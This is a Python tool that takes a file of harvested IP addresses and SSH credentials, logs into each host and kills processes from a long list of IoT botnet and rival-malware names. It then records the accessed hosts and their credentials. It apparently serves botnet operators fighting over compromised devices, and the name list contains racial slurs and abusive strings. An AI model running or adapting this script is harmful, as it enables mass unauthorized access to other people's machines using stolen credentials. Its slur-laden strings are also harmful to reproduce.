import asyncio
import paramiko
import os
from datetime import datetime

HITS_FILE = "hits.txt"
KILL_LOG = "killed_hosts.txt"
TIMEOUT = 8

COMMON_PROCS = [

    "902i13",
    "BzSxLxBxeY",
    "HOHO-LUGO7",
    "HOHO-U79OL",
    "JuYfouyf87",
    "NiGGeR69xd",
    "SO190Ij1X",
    "LOLKIKEEEDDE",
    "ekjheory98e",
    "scansh4",
    "MDMA",
    "fdevalvex",
    "scanspc",
    "MELTEDNINJAREALZ",
    "flexsonskids",
    "scanx86",
    "MISAKI-U79OL",
    "foAxi102kxe",
    "swodjwodjwoj",
    "MmKiy7f87l",
    "freecookiex86",
    "sysgpu",
    "frgege",
    "sysupdater",
    "0DnAzepd",
    "NiGGeRD0nks69",
    "frgreu",
    "0x766f6964",
    "NiGGeRd0nks1337",
    "gaft",
    "urasgbsigboa",
    "120i3UI49",
    "OaF3",
    "geae",
    "vaiolmao",
    "123123a",
    "Ofurain0n4H34D",
    "ggTrex",
    "ew",
    "wasads",
    "1293194hjXD",
    "OthLaLosn",
    "ggt",
    "wget-log",
    "1337SoraLOADER",
    "SAIAKINA",
    "ggtq",
    "1378bfp919GRB1Q2",
    "SAIAKUSO",
    "ggtr",
    "14Fa",
    "SEXSLAVE1337",
    "ggtt",
    "1902a3u912u3u4",
    "haetrghbr",
    "19ju3d",
    "SORAojkf120",
    "hehahejeje92",
    "2U2JDJA901F91",
    "SlaVLav12",
    "helpmedaddthhhhh",
    "2wgg9qphbq",
    "Slav3Th3seD3vices",
    "hzSmYZjYMQ",
    "5Gbf",
    "sora",
    "SoRAxD123LOL",
    "iaGv",
    "5aA3",
    "SoRAxD420LOL",
    "insomni",
    "640277",
    "SoraBeReppin1337",
    "ipcamCache",
    "66tlGg9Q",
    "jUYfouyf87",
    "6ke3",
    "TOKYO3",
    "lyEeaXul2dULCVxh",
    "93OfjHZ2z",
    "TY2gD6MZvKc7KU6r",
    "mMkiy6f87l",
    "A023UU4U24UIU",
    "TheWeeknd",
    "mioribitches",
    "A5p9",
    "TheWeeknds",
    "mnblkjpoi",
    "AbAd",
    "Tokyos",
    "neb",
    "Akiru",
    "U8inTz",
    "netstats",
    "Alex",
    "W9RCAKM20T",
    "newnetword",
    "Ayo215",
    "Word",
    "nloads",
    "BAdAsV",
    "Wordmane",
    "notyakuzaa",
    "Belch",
    "Wordnets",
    "obp",
    "BigN0gg0r420",
    "X0102I34f",
    "ofhasfhiafhoi",
    "BzSxLxBxeY",
    "X19I239124UIU",
    "oism",
    "Deported",
    "XSHJEHHEIIHWO",
    "olsVNwo12",
    "DeportedDeported",
    "XkTer0GbA1",
    "onry0v03",
    "FortniteDownLOLZ",
    "Y0urM0mGay",
    "pussyfartlmaojk",
    "GrAcEnIgGeRaNn",
    "YvdGkqndCO",
    "qGeoRBe6BE",
    "GuiltyCrown",
    "ZEuS69",
    "s4beBsEQhd",
    "HOHO-KSNDO",
    "ZEuz69",
    "sat1234",
    "HOHO-LUGO7",
    "aj93hJ23",
    "scanHA",
    "alie293z0k2L",
    "scanJoshoARM",
    "HellInSide",
    "ayyyGangShit",
    "scanJoshoARM5",
    "HighFry",
    "b1gl",
    "scanJoshoARM6",
    "IWhPyucDbJ",
    "boatnetz",
    "scanJoshoARM7",
    "IuYgujeIqn",
    "btbatrtah",
    "902i13",
    "BzSxLxBxeY",
    "HOHO-LUGO7",
    "HOHO-U79OL",
    "JuYfouyf87",
    "NiGGeR69xd",
    "SO190Ij1X",
    "LOLKIKEEEDDE",
    "ekjheory98e",
    "scansh4",
    "MDMA",
    "fdevalvex",
    "scanspc",
    "MELTEDNINJAREALZ",
    "flexsonskids",
    "scanx86",
    "MISAKI-U79OL",
    "foAxi102kxe",
    "swodjwodjwoj",
    "MmKiy7f87l",
    "freecookiex86",
    "sysgpu",
    "frgege",
    "sysupdater",
    "0DnAzepd",
    "NiGGeRD0nks69",
    "frgreu",
    "0x766f6964",
    "NiGGeRd0nks1337",
    "gaft",
    "urasgbsigboa",
    "120i3UI49",
    "OaF3",
    "geae",
    "vaiolmao",
    "123123a",
    "Ofurain0n4H34D",
    "ggTrex",
    "ew",
    "wasads",
    "1293194hjXD",
    "OthLaLosn",
    "ggt",
    "wget-log",
    "1337SoraLOADER",
    "SAIAKINA",
    "ggtq",
    "1378bfp919GRB1Q2",
    "SAIAKUSO",
    "ggtr",
    "14Fa",
    "SEXSLAVE1337",
    "ggtt",
    "1902a3u912u3u4",
    "haetrghbr",
    "19ju3d",
    "SORAojkf120",
    "hehahejeje92",
    "2U2JDJA901F91",
    "SlaVLav12",
    "helpmedaddthhhhh",
    "2wgg9qphbq",
    "Slav3Th3seD3vices",
    "zex",
    "sex",
    "hzSmYZjYMQ",
    "5Gbf",
    "sora",
    "SoRAxD123LOL",
    "iaGv",
    "5aA3",
    "SoRAxD420LOL",
    "insomni",
    "640277",
    "SoraBeReppin1337",
    "ipcamCache",
    "66tlGg9Q",
    "jUYfouyf87",
    "6ke3",
    "TOKYO3",
    "lyEeaXul2dULCVxh",
    "93OfjHZ2z",
    "TY2gD6MZvKc7KU6r",
    "mMkiy6f87l",
    "A023UU4U24UIU",
    "TheWeeknd",
    "mioribitches",
    "A5p9",
    "TheWeeknds",
    "mnblkjpoi",
    "AbAd",
    "Tokyos",
    "neb",
    "Akiru",
    "U8inTz",
    "netstats",
    "Alex",
    "W9RCAKM20T",
    "newnetword",
    "Ayo215",
    "Word",
    "nloads",
    "BAdAsV",
    "Wordmane",
    "notyakuzaa",
    "Belch",
    "Wordnets",
    "obp",
    "BigN0gg0r420",
    "X0102I34f",
    "ofhasfhiafhoi",
    "BzSxLxBxeY",
    "X19I239124UIU",
    "oism",
    "Deported",
    "XSHJEHHEIIHWO",
    "olsVNwo12",
    "DeportedDeported",
    "XkTer0GbA1",
    "onry0v03",
    "FortniteDownLOLZ",
    "Y0urM0mGay",
    "pussyfartlmaojk",
    "GrAcEnIgGeRaNn",
    "YvdGkqndCO",
    "qGeoRBe6BE",
    "GuiltyCrown",
    "ZEuS69",
    "s4beBsEQhd",
    "HOHO-KSNDO",
    "ZEuz69",
    "sat1234",
    "HOHO-LUGO7",
    "aj93hJ23",
    "scanHA",
    "alie293z0k2L",
    "scanJoshoARM",
    "HellInSide",
    "ayyyGangShit",
    "scanJoshoARM5",
    "HighFry",
    "b1gl",
    "scanJoshoARM6",
    "IWhPyucDbJ",
    "boatnetz",
    "scanJoshoARM7",
    "IuYgujeIqn",
    "btbatrtah",
    "scanJoshoM68K",
    "JJDUHEWBBBIB",
    "scanJoshoMIPS",
    "JSDGIEVIVAVIG",
    "cKbVkzGOPa",
    "scanJoshoMPSL",
    "JuYfouyf87",
    "ccAD",
    "scanJoshoPPC",
    "KAZEN-OIU97",
    "chickenxings",
    "scanJoshoSH4",
    "yakuskzm8",
    "KAZEN-PO78H",
    "cleaner",
    "scanJoshoSPC",
    "KAZEN-U79OL",
    "dbeef",
    "scanJoshoX86",
    "yakuz4c24",
    "KETASHI32",
    "ddrwelper",
    "scanarm5",
    "zPnr6HpQj2",
    "Kaishi-Iz90Y",
    "deexec",
    "scanarm6",
    "zdrtfxcgy",
    "Katrina32",
    "doCP3fVj",
    "scanarm7",
    "zxcfhuio",
    "Ksif91je39",
    "scanm68k",
    "Kuasa",
    "dvrhelper",
    "l33t_feet",
    "l33t",
    "l33tfeet",
    "scanmips",
    "KuasaBinsMate",
    "eQnOhRk85r",
    "scanmpsl",
    "LOLHHHOHOHBUI",
    "eXK20CL12Z",
    "nya",
    "mezy",
    "QBotBladeSPOOKY",
    "hikariwashere",
    "0DnAzepd",
    "p4029x91xx",
    "32uhj4gbejh",
    "wizard",
    "zhr",
    "a.out",
    "boatnet",
    "dbg",
    "condi",
    "heroshima",
    "skid.dbg",
    "lzrd",
    "PownedSecurity69",
    "ggt",
    ".ares",
    "fxlyazsxhy",
    "UNSTABLE",
    "unstable_is_the_story_of_the_universe",
    "moobot",
    "jnsd9sdoila",
    "BzSxLxBxeY",
    "yourmomgaeis",
    "sdfjiougsioj",
    "Oasis",
    "ggtr",
    "SEGRJIJHFVNHSNHEIHFOS",
    "apep999",
    "KOWAI-BAdAsV",
    "KOWAI-SAD",
    "jHKipU7Yl",
    "airdropmalware",
    "your_verry_fucking_gay",
    "Big-Bro-Bright",
    "sefaexec",
    "shirololi",
    "eagle.",
    "For-Gai-Mezy",
    "0x6axNL",
    "cloqkisvspooky",
    "myth",
    "SwergjmioG",
    "KILLEJW(IU(JIWERGFJGJWJRG",
    "Hetrh",
    "wewrthe",
    "IuFdKssCxz",
    "jSDFJIjio",
    "OnrYoXd666",
    "ewrtkjoketh",
    "ajbdf89wu823",
    "AAaasrdgs",
    "WsGA4@F6F",
    "GhostWuzHere666",
    "BOGOMIPS",
    "beastmode",
    "dvrHelper",
    "bestmode",
    "beastmode",
    "sfc6aJfIuY",
    "Demon.",
    "xeno-is-god",
    "ICY-P-0ODIJ",
    "gSHUIHIfh",
    "wrgL",
    "hu87VhvQPz",
    "luna",
    "dakuexecbin",
    "TacoBellGodYo",
    "loligang",
    "Execution",
    "orbitclient",
    "Amnesia",
    "Owari",
    "UnHAnaAW",
    "z3hir",
    "obbo",
    "miori",
    "eagle",
    "doxx"
    "Rollie",
    "lessie.",
    "sora",
    "hax.",
    "yakuza",
    "wordminer",
    "minerword",
    "SinixV4",
    "hoho",
    "g0dbu7tu",
    "orphic",
    "furasshu",
    "horizon",
    "assailant",
    "Ares",
    "Kawaiihelper",
    "ECHOBOT",
    "DEMONS",
    "kalon",
    "Josho",
    "daddyscum",
    "akira.ak",
    "Hilix",
    "daku",
    "Tsunami",
    "estella",
    "Solar",
    "rift",
    "_-255.Net",
    "Cayosin",
    "Okami",
    "sysupdater",
    "OnrYoXd666",
    "Kosha",
    "bushido",
    "trojan",
    "shiina",
    "Reaper.",
    "Corona.",
    "wrgnuwrijo",
    "BOXOFABOX",
    "Aka",
    "Hari",
    "orage",
    "fibre",
    "galil",
    "stresserpw",
    "stresser.pw",
    "luna",
    "catnet",
    "TheCowSaysGoodBye",
    "distrubter",
    "22269",
    "reportback",
    "telport",
    "zyad1234",
    "stresser.su",
    "Tohru",
    "jeffspender",
    "botnet",
    "Omni",
    "hamlog",
    "mirailovers",
    "xlk.",
    "busyboxxx",
    "busyboxx",
    "Josho",
    "kawaii",
    "Frosti",
    "sxj472sz",
    "HU6FIZTQU",
    "PFF1500RG",
    "plzjustfuckoff",
    "nvitpj",
    "elfLoad",
    "mioribitches",
    "Amakano",
    "tokupdater",
    "cum-n-go",
    "oblivion",
    "Voltage",
    "scanppc",
    "./"
]

async def kill_remote(ip, username, password):
    try:
        client = paramiko.SSHClient()
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        await asyncio.to_thread(client.connect, ip, 22, username, password, timeout=TIMEOUT)

        for proc in COMMON_PROCS:
            cmd = f"pkill -f '{proc}'"
            await asyncio.to_thread(client.exec_command, cmd)
            await asyncio.sleep(0.2)

        # Confirm shell access
        stdin, stdout, _ = await asyncio.to_thread(client.exec_command, "echo KILLED_OK")
        output = stdout.read().decode().strip()
        if "KILLED_OK" in output:
            print(f"[+] Cleaned {ip} ({username}:{password})")
            await save_kill(ip, username, password)

        client.close()

    except Exception as e:
        print(f"[-] FAIL {ip} ({username}:{password}) => {e}")

async def save_kill(ip, user, pw):
    line = f"[{datetime.utcnow().isoformat()}] {ip} - {user}:{pw}\n"
    async with asyncio.Lock():
        with open(KILL_LOG, "a") as f:
            f.write(line)

async def process_hits():
    tasks = []
    with open(HITS_FILE, "r") as f:
        for line in f:
            parts = line.strip().split()
            if len(parts) < 3:
                continue
            ip_port = parts[1]
            ip, _ = ip_port.split(":")
            creds = parts[3].split(":")
            if len(creds) == 2:
                user, pw = creds
                tasks.append(kill_remote(ip, user, pw))

    await asyncio.gather(*tasks)

def run_killer():
    try:
        import nest_asyncio
        nest_asyncio.apply()
    except:
        pass
    loop = asyncio.get_event_loop()
    loop.run_until_complete(process_hits())

if __name__ == "__main__":
    run_killer()







#pip install paramiko nest_asyncio









